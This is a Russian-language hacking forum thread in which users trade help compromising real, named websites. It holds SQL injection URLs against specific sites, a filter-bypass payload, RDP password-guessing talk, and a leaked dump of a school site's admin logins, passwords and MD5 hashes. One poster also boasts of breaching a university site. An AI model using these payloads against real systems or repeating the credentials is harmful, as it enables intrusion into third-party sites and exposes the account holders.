3000 адресов? Как по-вашему, сколько из них будут живы? На скольких из них будет винда? На скольких из них будет открыт rdp? А на скольких будет такой пароль?
ну их 200, которые я проверил были все живые, но ни к одному пароль не подошел. Можете подсказать словарь с оптимальным соотношением размер/качество. APPS у меня 5.
Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте. Code: http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1 Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен. Code: http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271 Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось. Code: http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться. Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.
зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.
Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай. Таблички: Code: g8s_2class g8s_2discipline g8s_2mark g8s_2pupil g8s_a_admin g8s_a_conf g8s_a_menu g8s_a_page g8s_article g8s_block g8s_class g8s_classhistory g8s_download g8s_graduate g8s_guestbook g8s_letter g8s_menu g8s_news g8s_newspicture g8s_pha_picture g8s_photoalbum g8s_picture g8s_pupil g8s_qa g8s_timetable g8s_user g8s_user2 g8s_v_answer g8s_v_poll g8s_v_question Логин:пасс от админки: Code: 1 (1) 5 (5) SV (Dubikova) zx12 (megaadmin) 23091975 (admin) 354000 (Director) Хеши: Code: admin:4e083bb0bb327b00362f717e42d24f8e 5:e4da3b7fbbce2345d7772b0674a318d5 1:c4ca4238a0b923820dcc509a6f75849b Dubikova:d38212a0c0e98f678feaaa5a8b9167f5 psy:0af3a5cd53f0ddc6bfd706229be937d1 rde:c2d216144060d7b2b3a08364e50cfa99 Director:0b7f85ee5ac5939661a6517d1a53737a megaadmin:3b94f9bb839a88ea045b5dc2b77722ad Сама админка где-то в /admin/, развлекайся, в запросе две колонки. UPD: и да, там еще где-то валяется fckeditor, возможно бажный.
Тут похожу уязвиость не в cms а в плагине remository Это подтверждает http://games.onet.ua/index.php?option=com_remository&Itemid=32&func=select&id=0 http://games.onet.ua/components/com_remository/language/ Полазил в сорцах - нигде не слова о версии... Хз вобщем чем тебе помочь... Вот единственное что нагуглил но тут скорее всего версия посвежее http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html
Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.
Фильтруется from Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+ Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+ Как можно обойти фильтр ?
Тьфу, ёпрст, я уж думал это вопрос Ну а раз нет ссылки погуглил, нашел и крутанул сайт Code: Красноярский государственный медицинский университет - Клуб выпускников ...бывает))) П.С. Извиняюсь за офф.топ
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна да, не... молодец, все норм)))
Что с этим сделать надо? Если раскрутить, то вот. http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
Почему не выводит имя таблиц(ы)? Code: www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11+--+
